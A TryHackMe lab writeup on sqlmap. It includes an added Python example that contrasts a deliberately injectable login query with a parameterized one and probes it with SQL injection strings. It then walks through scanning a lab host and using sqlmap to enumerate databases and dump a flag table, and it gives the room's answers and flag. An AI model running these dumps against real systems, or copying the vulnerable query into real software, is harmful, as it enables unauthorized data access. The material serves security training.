SQLMap - TryHackMe Writeup






Task 1: Introduction

What is sqlmap?

sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws in web applications. SQL injection is a critical security vulnerability that allows an attacker to interfere with the queries an application makes to its database, potentially leading to unauthorized data access, data modification, or even complete database takeover.
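What "interfering with the queries" means for a login form, and the fix, as an added example that is not part of the original writeup or the room's application. The table, the sample account and the function names are hypothetical, and an in-memory SQLite database stands in for the real backend.

```python
import sqlite3

def make_db():
    """Constructed sample data (plaintext password only to keep the sample short)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    return db

def login_vulnerable(db, username, password):
    # User input is pasted into the SQL text, so a quote character in the
    # input ends the string literal and the rest is parsed as SQL.
    query = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return db.execute(query).fetchone()[0] > 0

def login_hardened(db, username, password):
    # Placeholders keep the input out of the SQL text: the driver binds it
    # as a value, so it can never change the structure of the query.
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone()[0] > 0

def injection_regression_check(login):
    """Return True only if `login` treats SQL metacharacters as plain data."""
    db = make_db()
    probes = ["'", "' OR '1'='1", "' OR 1=1 -- "]
    for probe in probes:
        try:
            if login(db, "alice", probe):
                return False  # the probe changed the logic of the query
        except sqlite3.Error:
            return False      # the probe broke the syntax of the query
    # A safe handler must still accept the real credentials.
    return login(db, "alice", "correct-horse")

if __name__ == "__main__":
    for fn in (login_vulnerable, login_hardened):
        verdict = "safe" if injection_regression_check(fn) else "INJECTABLE"
        print(f"{fn.__name__}: {verdict}")
```

A check like this can run in CI against every handler that builds SQL from request parameters.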


Task 2: Using Sqlmap



Task 3: SQLMap Challenge


I started by running the default Rustscan.


rustscan -a 10.10.90.138 -- -A  -sV         

I found port 80 to be open.

I visited the website and discovered this.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.90.138         

I ran the Gobuster tool to find any available directories. I found /blood.


It had a login page and a registration option. I clicked on the login, then used Burp Suite to intercept the login page and saved it as a TXT file.

We now use SQLMap to enumerate the databases for usernames, passwords, and all other data that can be found in them.

To enumerate the current database:

sqlmap -r sqlmap.txt --current-db        

sqlmap -r sqlmap.txt --dbs        

Since we are looking for the flag table, we list the tables in the blood database:

sqlmap -r sqlmap.txt -D blood --tables        

Now I can check each table. I select the second table named flag, which is of interest, and check for available columns in it with the following command.

sqlmap -r sqlmap.txt -D blood -T flag --columns        

Then I dump all the information in this particular database table named "flag" using the following command:

sqlmap -r sqlmap.txt -D blood -T flag --dump

Question 1 : What is the name of the interesting directory?

Answer : blood

Question 2 : Who is the current db user?

Answer : root

Question 3 : What is the final flag?

Answer : thm{sqlm@p_is_L0ve}



Thanks for visiting:
